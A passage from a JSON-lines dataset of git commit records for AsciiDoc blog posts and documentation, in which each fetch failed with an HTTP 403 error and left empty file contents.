2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bdebfdc262f83483eed815bed054ce5410e46e09","subject":"Update 2015-01-31-My-English-Title.adoc","message":"Update 2015-01-31-My-English-Title.adoc","repos":"iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io","old_file":"_posts\/2015-01-31-My-English-Title.adoc","new_file":"_posts\/2015-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iveskins\/iveskins.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40a5fae043197d1136d1d00194107c9e3f7457f8","subject":"Update 2015-10-13-HDFS-tutorial.adoc","message":"Update 2015-10-13-HDFS-tutorial.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-13-HDFS-tutorial.adoc","new_file":"_posts\/2015-10-13-HDFS-tutorial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e25f189fc2df706a2672913b98ac401218362e71","subject":"[TEST] Added TESTING.asciidoc with some info on testing","message":"[TEST] Added TESTING.asciidoc with some info on testing\n\nThe goal of TESTING.asciidoc is not to repeat what's already in the elasticsearch core test cheatsheet, but only add what is different in shield.\n\nOriginal commit: elastic\/x-pack-elasticsearch@51ad3894d2cfc41291a2ab5720022aa42bd31860\n","repos":"scorpionvicky\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,vroyer\/elassandra,nknize\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,gfyoung\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,HonzaKral\/elasticsearch,strapdata\/elassandra,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,strapdata\/elassandra,robin13\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,vroyer\/elassandra,vroyer\/elassandra,uschindler\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch","old_file":"TESTING.asciidoc","new_file":"TESTING.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"161b0bc660b97c3eb277e4882c71ff476eddb253","subject":"Publish 2016-12-2-3-Dpen.adoc","message":"Publish 
2016-12-2-3-Dpen.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-12-2-3-Dpen.adoc","new_file":"2016-12-2-3-Dpen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9eeb96dd0083c4c65f13ef8798b0e48d7a85238","subject":"y2b create post 3 Unique Gadgets You Wouldn't Expect To Exist","message":"y2b create post 3 Unique Gadgets You Wouldn't Expect To Exist","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-23-3%20Unique%20Gadgets%20You%20Wouldn't%20Expect%20To%20Exist.adoc","new_file":"_posts\/2018-02-23-3%20Unique%20Gadgets%20You%20Wouldn't%20Expect%20To%20Exist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47eaf5dec45c384683beb0a599b4b12cda417d11","subject":"Delete the file at '_posts\/2018-02-25-3-Unique-Gadgets-You-Wouldn't-Expect-To-Exist.adoc'","message":"Delete the file at '_posts\/2018-02-25-3-Unique-Gadgets-You-Wouldn't-Expect-To-Exist.adoc'","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-25-3-Unique-Gadgets-You-Wouldn't-Expect-To-Exist.adoc","new_file":"_posts\/2018-02-25-3-Unique-Gadgets-You-Wouldn't-Expect-To-Exist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d57cb0eb0d29ef7b34f0c68f81ccc0e22284467","subject":"Fix #630","message":"Fix #630\n","repos":"fvasquezjatar\/fermat-unused,fvasquezjatar\/fermat-unused","old_file":"fermat-documentation\/technical notes\/Bitcoin configuration\/Local bitcoin environment.asciidoc","new_file":"fermat-documentation\/technical notes\/Bitcoin configuration\/Local bitcoin environment.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fvasquezjatar\/fermat-unused.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b915dae2119f47e488bff1dc65ceda17fea814c3","subject":"Update 2017-11-10-Neo4j-Enterprise-330-is-out-but-you-may-have-noticed-that-while-still-open-source-you-are-going-to-have-a-harder-time-getting-the-enterprise-package-with-its-free-open-source-license.adoc","message":"Update 
2017-11-10-Neo4j-Enterprise-330-is-out-but-you-may-have-noticed-that-while-still-open-source-you-are-going-to-have-a-harder-time-getting-the-enterprise-package-with-its-free-open-source-license.adoc","repos":"igovsol\/blog,igovsol\/blog,igovsol\/blog,igovsol\/blog","old_file":"_posts\/2017-11-10-Neo4j-Enterprise-330-is-out-but-you-may-have-noticed-that-while-still-open-source-you-are-going-to-have-a-harder-time-getting-the-enterprise-package-with-its-free-open-source-license.adoc","new_file":"_posts\/2017-11-10-Neo4j-Enterprise-330-is-out-but-you-may-have-noticed-that-while-still-open-source-you-are-going-to-have-a-harder-time-getting-the-enterprise-package-with-its-free-open-source-license.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igovsol\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21a0c8a78428fc7b28bb96025031d78159c66f47","subject":"Update 2017-07-11-The-very-scary-phenomenum-of-things-starting-to-get-concrete.adoc","message":"Update 2017-07-11-The-very-scary-phenomenum-of-things-starting-to-get-concrete.adoc","repos":"mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog","old_file":"_posts\/2017-07-11-The-very-scary-phenomenum-of-things-starting-to-get-concrete.adoc","new_file":"_posts\/2017-07-11-The-very-scary-phenomenum-of-things-starting-to-get-concrete.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mairandomness\/randomblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"982f2e69a100d8ac4242501cc6441f87843bf14d","subject":"Update 2016-03-29-Microservices-in-the-Chronicle-world-Part-4.adoc","message":"Update 2016-03-29-Microservices-in-the-Chronicle-world-Part-4.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2016-03-29-Microservices-in-the-Chronicle-world-Part-4.adoc","new_file":"_posts\/2016-03-29-Microservices-in-the-Chronicle-world-Part-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3e3db9ad71e6982737ed35cba2a9b3247e282e7","subject":"Update 2016-11-05-About-the-Author.adoc","message":"Update 2016-11-05-About-the-Author.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-About-the-Author.adoc","new_file":"_posts\/2016-11-05-About-the-Author.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e8959b7863a1454c6f19ccb5319ad9abbc2ed786","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 
2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f089482090d23226ddb19939d38603d380c778dc","subject":"Update 2016-11-21-Fresh-Start.adoc","message":"Update 2016-11-21-Fresh-Start.adoc","repos":"acristyy\/acristyy.github.io,acristyy\/acristyy.github.io,acristyy\/acristyy.github.io,acristyy\/acristyy.github.io","old_file":"_posts\/2016-11-21-Fresh-Start.adoc","new_file":"_posts\/2016-11-21-Fresh-Start.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/acristyy\/acristyy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df640d7a79e92ac9e41d72a6fb8563ebd1ac837d","subject":"Update 2012-01-01-Lobby-GitHub-for-AsciiDoc-Support-in-Jekyll-Blogs-Hosted-on-GitHub-Pages.adoc","message":"Update 2012-01-01-Lobby-GitHub-for-AsciiDoc-Support-in-Jekyll-Blogs-Hosted-on-GitHub-Pages.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog","old_file":"_posts\/2012-01-01-Lobby-GitHub-for-AsciiDoc-Support-in-Jekyll-Blogs-Hosted-on-GitHub-Pages.adoc","new_file":"_posts\/2012-01-01-Lobby-GitHub-for-AsciiDoc-Support-in-Jekyll-Blogs-Hosted-on-GitHub-Pages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8f2587cdb36578acef8dd313981f18ba74ab747","subject":"Added more docs about the demo; fixes #67","message":"Added more docs about the demo; fixes #67\n","repos":"wybczu\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines","old_file":"docs\/DEMO.adoc","new_file":"docs\/DEMO.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wybczu\/spring-cloud-pipelines.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b02f36f28c114e0d8db29c20240157dea4e26e8d","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 
2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d44fb6b5299c93f23b8629e3507f5413d29465d7","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80a30e1513a9614622e08657b94dca56db9e250f","subject":"doc: userguide: expand crypto documentation to cover random apis","message":"doc: userguide: expand crypto documentation to cover random apis\n\nClean up the crypto section of the User Guide and expand on the\nODP random data APIs.\n\nSigned-off-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nReviewed-by: Petri Savolainen <d528fd253b9aaf78fa72edbcc6249e82047f6ce6@nokia.com>\nSigned-off-by: Maxim Uvarov <db4d16e02ae2d7493db430203537da8b2e34f290@linaro.org>\n","repos":"nmorey\/odp,dkrot\/odp,nmorey\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,erachmi\/odp,nmorey\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,mike-holmes-linaro\/odp,dkrot\/odp,mike-holmes-linaro\/odp,ravineet-singh\/odp,nmorey\/odp,erachmi\/odp,ravineet-singh\/odp,dkrot\/odp,erachmi\/odp,erachmi\/odp,dkrot\/odp","old_file":"doc\/users-guide\/users-guide-crypto.adoc","new_file":"doc\/users-guide\/users-guide-crypto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"8312888fc281ae4abfac753676864a2f49b38254","subject":"Update 2016-12-1-There-was-a-keynote-lecture.adoc","message":"Update 2016-12-1-There-was-a-keynote-lecture.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-1-There-was-a-keynote-lecture.adoc","new_file":"_posts\/2016-12-1-There-was-a-keynote-lecture.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d7211dbc255d95e6e54f191120690fa031e0fa83","subject":"Update 2016-08-09-xiaocase2.adoc","message":"Update 
2016-08-09-xiaocase2.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-09-xiaocase2.adoc","new_file":"_posts\/2016-08-09-xiaocase2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e8523e779cc10d1beb39b8f6d57c116406af505","subject":"schema: updated docs","message":"schema: updated docs\n","repos":"pombredanne\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore,djangonauts\/django-hstore,Stranger6667\/django-hstore,pombredanne\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore,pombredanne\/django-hstore,pombredanne\/django-hstore","old_file":"doc\/doc.asciidoc","new_file":"doc\/doc.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/djangonauts\/django-hstore.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60b5a095e12dc76f61570868a926bab22f8d5863","subject":"Update 2011-11-21-Transient.adoc","message":"Update 2011-11-21-Transient.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2011-11-21-Transient.adoc","new_file":"_posts\/2011-11-21-Transient.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2dac3bd92df8308bdcf2aab217554ff47c369852","subject":"Update 2016-12-14-Viagem-no-Tempo.adoc","message":"Update 2016-12-14-Viagem-no-Tempo.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"_posts\/2016-12-14-Viagem-no-Tempo.adoc","new_file":"_posts\/2016-12-14-Viagem-no-Tempo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"56a71b35393831375f6a5c73bbbccb8ffcc90d83","subject":"Update 2018-09-10-Firestore.adoc","message":"Update 2018-09-10-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-10-Firestore.adoc","new_file":"_posts\/2018-09-10-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f9c60d3024ca95e05a2efd0add087d96769645ac","subject":"Update 2016-11-14-redux-logger-index-has-no-default-export-redux-thunk-redux-promise-webpack-typescript.adoc","message":"Update 
2016-11-14-redux-logger-index-has-no-default-export-redux-thunk-redux-promise-webpack-typescript.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-11-14-redux-logger-index-has-no-default-export-redux-thunk-redux-promise-webpack-typescript.adoc","new_file":"_posts\/2016-11-14-redux-logger-index-has-no-default-export-redux-thunk-redux-promise-webpack-typescript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4dcdc5cef68f9caa091a944ab7a407d38e6923ed","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e37343ccec74dd5b7740f2b53371b063facc42e9","subject":"Update 2011-07-02-SSLTLS-en-Java-Partie-1.adoc","message":"Update 2011-07-02-SSLTLS-en-Java-Partie-1.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2011-07-02-SSLTLS-en-Java-Partie-1.adoc","new_file":"_posts\/2011-07-02-SSLTLS-en-Java-Partie-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f09a24065983b47b6822e0437101f2095a43c0b4","subject":"Update 2015-11-11-Introduction-a-Angular2.adoc","message":"Update 2015-11-11-Introduction-a-Angular2.adoc","repos":"Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io","old_file":"_posts\/2015-11-11-Introduction-a-Angular2.adoc","new_file":"_posts\/2015-11-11-Introduction-a-Angular2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vtek\/vtek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b29068ad3a68e1389386aa343460e86ad5c162f","subject":"Update 2018-11-02-Amazon-Linux-E-C2chrony.adoc","message":"Update 2018-11-02-Amazon-Linux-E-C2chrony.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-02-Amazon-Linux-E-C2chrony.adoc","new_file":"_posts\/2018-11-02-Amazon-Linux-E-C2chrony.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0965d51aa39c8de2ea0035adace95db9547fff1","subject":"Update 2015-10-07-Environment-Configuration-Management-in-Maven.adoc","message":"Update 
2015-10-07-Environment-Configuration-Management-in-Maven.adoc","repos":"wesamhaboush\/wesamhaboush.github.io,wesamhaboush\/wesamhaboush.github.io,wesamhaboush\/wesamhaboush.github.io","old_file":"_posts\/2015-10-07-Environment-Configuration-Management-in-Maven.adoc","new_file":"_posts\/2015-10-07-Environment-Configuration-Management-in-Maven.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wesamhaboush\/wesamhaboush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20fa7da91202c6c1b0f45c7df9afb4a7d7190529","subject":"y2b create post Griffin Slap (Nano Watch) Unboxing \\u0026 Overview","message":"y2b create post Griffin Slap (Nano Watch) Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-02-15-Griffin-Slap-Nano-Watch-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-02-15-Griffin-Slap-Nano-Watch-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"019885eeba74d74a86f024f057e8a9d85af31d60","subject":"Update 2017-02-16-React.adoc","message":"Update 2017-02-16-React.adoc","repos":"ovo-6\/ovo-6.github.io,ovo-6\/ovo-6.github.io,ovo-6\/ovo-6.github.io,ovo-6\/ovo-6.github.io","old_file":"_posts\/2017-02-16-React.adoc","new_file":"_posts\/2017-02-16-React.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ovo-6\/ovo-6.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c06c3eec919a86c6079bb0cbd5de685ce5490e0","subject":"Update 2018-05-27-G-A-S.adoc","message":"Update 2018-05-27-G-A-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-27-G-A-S.adoc","new_file":"_posts\/2018-05-27-G-A-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62654e2219b39ce14b4fc27e0b08128be4f53e79","subject":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","message":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd1f11ea551adf019c8fbec12ac8d751f61bb0d0","subject":"Update 2017-12-25-A-W-S-re-Invent2017-E-X-P-O.adoc","message":"Update 
2017-12-25-A-W-S-re-Invent2017-E-X-P-O.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-25-A-W-S-re-Invent2017-E-X-P-O.adoc","new_file":"_posts\/2017-12-25-A-W-S-re-Invent2017-E-X-P-O.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d5a585130d6e85df9b297f52b7386e9c8435f1d","subject":"Update 2019-04-22-Cloud-Run.adoc","message":"Update 2019-04-22-Cloud-Run.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-04-22-Cloud-Run.adoc","new_file":"_posts\/2019-04-22-Cloud-Run.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e2f558887f02eb747e08ee3c92e9e4cfbcf93b0","subject":"Added link to Swagger for Elasticsearch","message":"Added link to Swagger for 